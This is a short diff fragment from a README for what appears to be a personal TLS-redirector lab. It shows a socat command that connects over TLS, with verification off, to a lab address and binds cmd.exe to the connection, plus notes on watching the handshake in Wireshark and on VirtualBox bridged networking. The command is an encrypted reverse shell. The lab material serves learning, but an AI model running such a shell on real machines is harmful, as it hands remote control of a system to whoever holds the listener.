zinzloun/TLS_redirect/README.md

 ```
 socat OPENSSL:192.168.1.7:443,verify=0 EXEC:'cmd.exe',pipes
 ```
-We can follow the stream usign Wireshark
+We can follow the hand shake usign Wireshark:

 ---
 **NOTE**
 ###### If your Lab (as mine) is created using a virtualizer (e.g. Virtualbox) remember that you can not itercept any traffics with a bridged mode network configuration on the host machine, since it bypass the host OS network stack entirely.
 Here I'm running Wireshark on the guest Parrot OS redirector
 ---